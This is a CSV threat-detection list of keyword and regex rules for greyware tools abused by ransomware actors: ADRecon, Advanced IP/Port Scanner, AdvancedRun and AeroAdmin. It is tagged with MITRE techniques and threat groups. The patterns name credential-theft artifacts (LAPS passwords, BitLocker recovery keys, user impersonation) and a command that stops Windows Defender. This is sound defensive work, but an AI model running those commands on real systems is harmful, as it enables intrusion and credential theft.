"*[Get-ADR-UserImpersonation] Alternate credentials successfully impersonated*",".{0,1000}\[Get\-ADR\-UserImpersonation\]\sAlternate\scredentials\ssuccessfully\simpersonated.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*\ADRecon.ps1*",".{0,1000}\\ADRecon\.ps1.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*\ADRecon-master*",".{0,1000}\\ADRecon\-master.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*\ADRecon-Report.xlsx*",".{0,1000}\\ADRecon\-Report\.xlsx.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*\BitLockerRecoveryKeys.csv*",".{0,1000}\\BitLockerRecoveryKeys\.csv.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*\DefaultPasswordPolicy.csv*",".{0,1000}\\DefaultPasswordPolicy\.csv.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*309a6b123ebdbb92766addeb8326311b86c26a21eb5cad30c8cde6c237019046*",".{0,1000}309a6b123ebdbb92766addeb8326311b86c26a21eb5cad30c8cde6c237019046.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","#filehash","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*ADRecon * by Prashant Mahajan (@prashant3535)*",".{0,1000}ADRecon\s.{0,1000}\sby\sPrashant\sMahajan\s\(\@prashant3535\).{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*ADRecon -OutputDir *",".{0,1000}ADRecon\s\-OutputDir\s.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*ADRecon.ps1*",".{0,1000}ADRecon\.ps1.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","Discovery","https://github.com/adrecon/ADRecon","1","1","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*adrecon/ADRecon*",".{0,1000}adrecon\/ADRecon.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","1","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*ADRecon-Console-Log.txt*",".{0,1000}ADRecon\-Console\-Log\.txt.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*ADRecon-master.zip*",".{0,1000}ADRecon\-master\.zip.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","1","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*ADRecon-Report-*",".{0,1000}ADRecon\-Report\-.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*-ADRecon-Report.xlsx*",".{0,1000}\-ADRecon\-Report\.xlsx.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*Get-LAPSPasswords.ps1*",".{0,1000}Get\-LAPSPasswords\.ps1.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*Invoke-ADRecon*",".{0,1000}Invoke\-ADRecon.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","1","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*Invoke-UserImpersonation -Credential *",".{0,1000}Invoke\-UserImpersonation\s\-Credential\s.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z"
"*/Advanced_Port_Scanner_*.exe*",".{0,1000}\/Advanced_Port_Scanner_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*/lansearch.exe*",".{0,1000}\/lansearch\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Advanced Port Scanner Portable\*",".{0,1000}\\Advanced\sPort\sScanner\sPortable\\.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\lansearch.exe*",".{0,1000}\\lansearch\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Temp\2\Advanced Port Scanner 2\*",".{0,1000}\\Temp\\2\\Advanced\sPort\sScanner\s2\\.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*>Advanced Port Scanner Setup<*",".{0,1000}\>Advanced\sPort\sScanner\sSetup\<.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","#description","N/A","7","10","N/A","N/A","N/A","N/A"
"*>Advanced Port Scanner<*",".{0,1000}\>Advanced\sPort\sScanner\<.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","#productname","N/A","7","10","N/A","N/A","N/A","N/A"
"*advanced_port_scanner.exe*",".{0,1000}advanced_port_scanner\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*advanced_port_scanner_console.exe*",".{0,1000}advanced_port_scanner_console\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb*",".{0,1000}d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A"
"*http://www.advanced-port-scanner.com/checkupdate.php*",".{0,1000}http\:\/\/www\.advanced\-port\-scanner\.com\/checkupdate\.php.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*lansearch.exe *",".{0,1000}lansearch\.exe\s.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*lansearchpro_portable.zip*",".{0,1000}lansearchpro_portable\.zip.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*lansearchpro_setup.exe*",".{0,1000}lansearchpro_setup\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*Program Files (x86)\Advanced Port Scanner\*",".{0,1000}Program\sFiles\s\(x86\)\\Advanced\sPort\sScanner\\.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*.exe /s:ip_ranges.txt /f:scan_results.txt*",".{0,1000}\.exe\s\/s\:ip_ranges\.txt\s\/f\:scan_results\.txt.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Advanced IP Scanner.lnk*",".{0,1000}\\Advanced\sIP\sScanner\.lnk.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\advanced_ip_scanner*",".{0,1000}advanced_ip_scanner.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Local\Temp\Advanced IP Scanner 2\*",".{0,1000}\\Local\\Temp\\Advanced\sIP\sScanner\s2\\.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\Advanced IP Scanner\*",".{0,1000}\\Program\sFiles\s\(x86\)\\Advanced\sIP\sScanner\\.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Programs\Advanced IP Scanner Portable\*",".{0,1000}\\Programs\\Advanced\sIP\sScanner\sPortable\\.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Start Menu\Programs\Advanced IP Scanner v2*",".{0,1000}\\Start\sMenu\\Programs\\Advanced\sIP\sScanner\sv2.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*>Advanced IP Scanner Setup<*",".{0,1000}\>Advanced\sIP\sScanner\sSetup\<.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","#description","N/A","7","10","N/A","N/A","N/A","N/A"
"*>Advanced IP Scanner<*",".{0,1000}\>Advanced\sIP\sScanner\<.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","#productname","N/A","7","10","N/A","N/A","N/A","N/A"
"*26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193b*",".{0,1000}26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193b.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A"
"*26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193b*",".{0,1000}26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193b.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A"
"*Advanced IP Scanner*",".{0,1000}Advanced\sIP\sScanner.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*Advanced_IP_Scanner*.exe*",".{0,1000}Advanced_IP_Scanner.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*advanced_ip_scanner_console.exe*",".{0,1000}advanced_ip_scanner_console\.exe.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*https://download.advanced-ip-scanner.com/download/files/*.exe*",".{0,1000}https\:\/\/download\.advanced\-ip\-scanner\.com\/download\/files\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*AdvancedRun.exe /EXEFilename *\sc.exe*stop WinDefend*",".{0,1000}AdvancedRun\.exe\s\/EXEFilename\s.{0,1000}\\sc\.exe.{0,1000}stop\sWinDefend.{0,1000}","greyware_tool_keyword","AdvancedRun","nirsoft tool  - Run a program with different settings that you choose","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"* aeroadmin.exe*",".{0,1000}\saeroadmin\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/aeroadmin.exe*",".{0,1000}\/aeroadmin\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AeroAdmin *_Portable.exe*",".{0,1000}\\AeroAdmin\s.{0,1000}_Portable\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
